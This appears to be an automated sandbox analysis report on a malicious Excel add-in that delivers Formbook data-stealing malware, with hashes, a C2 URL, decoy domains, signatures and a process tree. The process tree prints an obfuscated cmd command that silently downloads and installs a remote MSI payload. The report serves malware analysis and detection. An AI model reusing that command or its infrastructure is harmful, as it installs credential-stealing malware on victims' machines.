Analysis

  • max time kernel
    150s
  • max time network
    143s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    06-05-2021 13:43

General

  • Target

    14.xlam

  • Size

    15KB

  • MD5

    11e9376ee19889ee5c08e816b1d3b231

  • SHA1

    d22b56bedc58de7da73d647a5f3048b9cabc17d7

  • SHA256

    cfee90218720f31491495dd353027017808fb3b9524d6c86ddfd016a372f627c

  • SHA512

    fe846e63b1616166bebed98bdea82f1d141a23a0abc68cf6dc94216f9b0242859dcebd5471aa0943a46a5ecfca1e430badaf049db4469ec3a13a252b2eb8164b

Malware Config

Extracted

Family

formbook

Version

4.1

C2

http://www.111bjs.com/ccr/

Decoy

abdullahlodhi.com

jevya.com

knoxvillerestaurant.com

mekarauroko7389.com

cricketspowder.net

johannchirinos.com

orangeorganical.com

libero-tt.com

lorenaegianluca.com

wintab.net

modernmillievintage.com

zgdqcyw.com

jeffabildgaardmd.com

nurulfikrimakassar.com

findyourchef.com

innovationsservicegroup.com

destek-taleplerimiz.com

whfqqco.icu

kosmetikmadeingermany.com

dieteticos.net

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Formbook Payload 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 6 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 58 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:2996
    • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\14.xlam"
      2⤵
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3904
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C m^SiE^x^e^c /i http://farm-finn.com/admin/4409212.msi /qn
        3⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2460
        • C:\Windows\system32\msiexec.exe
          mSiExec /i http://farm-finn.com/admin/4409212.msi /qn
          4⤵
          • Use of msiexec (install) with remote resource
          • Suspicious use of AdjustPrivilegeToken
          PID:652
    • C:\Windows\SysWOW64\wlanext.exe
      "C:\Windows\SysWOW64\wlanext.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:412
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Windows\Installer\MSI4464.tmp"
        3⤵
          PID:3784
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Blocklisted process makes network request
      • Enumerates connected drives
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1228
      • C:\Windows\Installer\MSI4464.tmp
        "C:\Windows\Installer\MSI4464.tmp"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:1744
        • C:\Windows\Installer\MSI4464.tmp
          "C:\Windows\Installer\MSI4464.tmp"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          PID:1240

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    3
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    4
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
      MD5

      4fcb2a3ee025e4a10d21e1b154873fe2

      SHA1

      57658e2fa594b7d0b99d02e041d0f3418e58856b

      SHA256

      90bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228

      SHA512

      4e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff

    • C:\Windows\Installer\MSI4464.tmp
      MD5

      d8a19f13154e81e9d526077422655453

      SHA1

      573e6aed1534203b36f9a8e5121c125b02e11b0f

      SHA256

      b525832c63ea5d05a8afde822fcb39e5fb759497e7c2c986a5673fec721ed853

      SHA512

      193344e672c7fb66fbd6acc2608c1d9acf360091ddf8086e5609e5a8ed511e1117fc2b7eb7cb43b56e984bf9f98f6a7648f8f1b0defc1416b2dca3c557ae39ae

    • C:\Windows\Installer\MSI4464.tmp
      MD5

      d8a19f13154e81e9d526077422655453

      SHA1

      573e6aed1534203b36f9a8e5121c125b02e11b0f

      SHA256

      b525832c63ea5d05a8afde822fcb39e5fb759497e7c2c986a5673fec721ed853

      SHA512

      193344e672c7fb66fbd6acc2608c1d9acf360091ddf8086e5609e5a8ed511e1117fc2b7eb7cb43b56e984bf9f98f6a7648f8f1b0defc1416b2dca3c557ae39ae

    • C:\Windows\Installer\MSI4464.tmp
      MD5

      d8a19f13154e81e9d526077422655453

      SHA1

      573e6aed1534203b36f9a8e5121c125b02e11b0f

      SHA256

      b525832c63ea5d05a8afde822fcb39e5fb759497e7c2c986a5673fec721ed853

      SHA512

      193344e672c7fb66fbd6acc2608c1d9acf360091ddf8086e5609e5a8ed511e1117fc2b7eb7cb43b56e984bf9f98f6a7648f8f1b0defc1416b2dca3c557ae39ae

    • \Users\Admin\AppData\Local\Temp\nsk4647.tmp\3dd73lht.dll
      MD5

      df8beafa8d4250032a73e261c80e35e3

      SHA1

      3ced0abd9f02d24d79ede5052f661108b01df997

      SHA256

      a57717b0b91bb128761a4363d12cacd45431c7e512d5a8d307b40cf30e6a26da

      SHA512

      bf9fd7009e3c4919b2b230748c8f3795423b4e7e57d82d531a31682916dfb589c2df2b20320a51b532e21dec98ce597a4a80589ec5fa442417274661e1c9d1ce

    • memory/412-195-0x0000000003210000-0x000000000323E000-memory.dmp
      Filesize

      184KB

    • memory/412-196-0x0000000003940000-0x0000000003C60000-memory.dmp
      Filesize

      3.1MB

    • memory/412-192-0x0000000000000000-mapping.dmp
    • memory/412-198-0x00000000037A0000-0x0000000003833000-memory.dmp
      Filesize

      588KB

    • memory/412-194-0x0000000000E60000-0x0000000000E77000-memory.dmp
      Filesize

      92KB

    • memory/652-180-0x0000000000000000-mapping.dmp
    • memory/1240-188-0x0000000000400000-0x000000000042E000-memory.dmp
      Filesize

      184KB

    • memory/1240-190-0x0000000000500000-0x000000000064A000-memory.dmp
      Filesize

      1.3MB

    • memory/1240-189-0x0000000000A80000-0x0000000000DA0000-memory.dmp
      Filesize

      3.1MB

    • memory/1240-185-0x000000000041EBB0-mapping.dmp
    • memory/1744-187-0x0000000002490000-0x0000000002492000-memory.dmp
      Filesize

      8KB

    • memory/1744-181-0x0000000000000000-mapping.dmp
    • memory/2460-179-0x0000000000000000-mapping.dmp
    • memory/2996-201-0x0000000000760000-0x0000000000770000-memory.dmp
      Filesize

      64KB

    • memory/2996-210-0x0000000000960000-0x0000000000970000-memory.dmp
      Filesize

      64KB

    • memory/2996-191-0x0000000005D50000-0x0000000005E70000-memory.dmp
      Filesize

      1.1MB

    • memory/2996-220-0x0000000000760000-0x0000000000770000-memory.dmp
      Filesize

      64KB

    • memory/2996-215-0x0000000000760000-0x0000000000770000-memory.dmp
      Filesize

      64KB

    • memory/2996-199-0x0000000005E70000-0x0000000005FC5000-memory.dmp
      Filesize

      1.3MB

    • memory/2996-217-0x0000000000760000-0x0000000000770000-memory.dmp
      Filesize

      64KB

    • memory/2996-200-0x0000000000730000-0x0000000000740000-memory.dmp
      Filesize

      64KB

    • memory/2996-203-0x0000000000760000-0x0000000000770000-memory.dmp
      Filesize

      64KB

    • memory/2996-202-0x0000000000940000-0x0000000000950000-memory.dmp
      Filesize

      64KB

    • memory/2996-204-0x0000000000760000-0x0000000000770000-memory.dmp
      Filesize

      64KB

    • memory/2996-206-0x0000000000760000-0x0000000000770000-memory.dmp
      Filesize

      64KB

    • memory/2996-205-0x0000000000760000-0x0000000000770000-memory.dmp
      Filesize

      64KB

    • memory/2996-208-0x0000000000960000-0x0000000000970000-memory.dmp
      Filesize

      64KB

    • memory/2996-207-0x0000000000760000-0x0000000000770000-memory.dmp
      Filesize

      64KB

    • memory/2996-218-0x0000000000760000-0x0000000000770000-memory.dmp
      Filesize

      64KB

    • memory/2996-211-0x0000000000760000-0x0000000000770000-memory.dmp
      Filesize

      64KB

    • memory/2996-209-0x0000000000760000-0x0000000000770000-memory.dmp
      Filesize

      64KB

    • memory/2996-212-0x0000000000760000-0x0000000000770000-memory.dmp
      Filesize

      64KB

    • memory/2996-213-0x0000000000760000-0x0000000000770000-memory.dmp
      Filesize

      64KB

    • memory/2996-214-0x0000000000760000-0x0000000000770000-memory.dmp
      Filesize

      64KB

    • memory/2996-216-0x0000000000960000-0x0000000000970000-memory.dmp
      Filesize

      64KB

    • memory/2996-219-0x0000000000760000-0x0000000000770000-memory.dmp
      Filesize

      64KB

    • memory/3784-193-0x0000000000000000-mapping.dmp
    • memory/3904-114-0x00007FF630BA0000-0x00007FF634156000-memory.dmp
      Filesize

      53.7MB

    • memory/3904-115-0x00007FF824490000-0x00007FF8244A0000-memory.dmp
      Filesize

      64KB

    • memory/3904-116-0x00007FF824490000-0x00007FF8244A0000-memory.dmp
      Filesize

      64KB

    • memory/3904-117-0x00007FF824490000-0x00007FF8244A0000-memory.dmp
      Filesize

      64KB

    • memory/3904-118-0x00007FF824490000-0x00007FF8244A0000-memory.dmp
      Filesize

      64KB

    • memory/3904-122-0x00007FF824490000-0x00007FF8244A0000-memory.dmp
      Filesize

      64KB

    • memory/3904-121-0x00007FF844F00000-0x00007FF845FEE000-memory.dmp
      Filesize

      16.9MB

    • memory/3904-123-0x00007FF843000000-0x00007FF844EF5000-memory.dmp
      Filesize

      31.0MB